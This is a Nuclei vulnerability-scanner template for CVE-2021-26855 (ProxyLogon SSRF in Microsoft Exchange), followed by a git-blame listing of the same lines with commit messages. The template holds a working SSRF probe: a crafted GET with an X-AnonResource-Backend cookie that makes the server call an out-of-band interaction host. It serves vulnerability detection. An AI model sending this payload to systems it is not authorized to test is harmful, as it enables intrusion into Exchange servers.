nuclei-templates/http/cves/2021/CVE-2021-26855.yaml

id: CVE-2021-26855

info:
  name: Microsoft Exchange Server SSRF Vulnerability
  author: madrobot
  severity: critical
  description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
  remediation: Apply the appropriate security update.
  reference:
    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
    - https://proxylogon.com/#timeline
    - https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
    - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-26855
    cwe-id: CWE-918
    epss-score: 0.97524
    epss-percentile: 0.99989
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query: vuln:CVE-2021-26855
  tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft,kev

http:
  - raw:
      - |
        GET /owa/auth/x.js HTTP/1.1
        Host: {{Hostname}}
        Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# digest: 4a0a00473045022008b4031739147299e16404167a96d18e3313d82b2ca0fcb2671a24bf5cd26611022100ce577d211c2ff3c688e7011601a3af44569c6566ad33ba7ad43e009837b18b77:922c64590222798bb761d5b6d8e72950
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00			`id: CVE-2021-26855`

			`info:`
Enhancement: cves/2021/CVE-2021-26855.yaml by mp 2022-02-04 16:13:25 +00:00			`name: Microsoft Exchange Server SSRF Vulnerability`
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00			`author: madrobot`
			`severity: critical`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: Apply the appropriate security update.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Enhancement: cves/2021/CVE-2021-26855.yaml by mp 2022-02-04 16:13:25 +00:00			`- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://proxylogon.com/#timeline`
Dead Site Removal (#4641) * Deleted buffalo-config-injection.yaml Add reference from buffalo-config-injection.yaml to CVE-2021-20091.yaml * Delete vulnerabilities/other/buffalo-config-injection.yaml * Link cleanups * Change links to Secunia to point to archive.org * Additonal link cleanup * replace securitytracker.com links with archive.org links 2022-07-01 10:02:07 +00:00			`- https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2021-26855`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cwe-id: CWE-918`
TemplateMan Update [Fri Nov 3 15:51:18 UTC 2023] :robot: 2023-11-03 15:51:18 +00:00			`epss-score: 0.97524`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`epss-percentile: 0.99989`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21::::::`
Auto Generated CVE annotations [Sun Jul 3 15:33:28 UTC 2022] :robot: 2022-07-03 15:33:28 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: microsoft`
			`product: exchange_server`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`shodan-query: vuln:CVE-2021-26855`
Updated "cisa" tags to "kev" + added tags to new applicable templates (#4871) 2022-07-21 17:18:22 +00:00			`tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft,kev`
misc changes 2021-03-06 07:34:26 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00			`- raw:`
			`- \|`
			`GET /owa/auth/x.js HTTP/1.1`
			`Host: {{Hostname}}`
minor updates 2021-08-12 15:54:09 +00:00			`Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;`
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00
			`matchers:`
			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: interactsh_protocol # Confirms the HTTP Interaction`
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00			`words:`
Enhancement: cves/2021/CVE-2021-26855.yaml by mp 2022-02-04 16:13:25 +00:00			`- "http"`
TemplateMan Update [Thu Nov 9 10:11:53 UTC 2023] :robot: 2023-11-09 10:11:53 +00:00
			`# digest: 4a0a00473045022008b4031739147299e16404167a96d18e3313d82b2ca0fcb2671a24bf5cd26611022100ce577d211c2ff3c688e7011601a3af44569c6566ad33ba7ad43e009837b18b77:922c64590222798bb761d5b6d8e72950`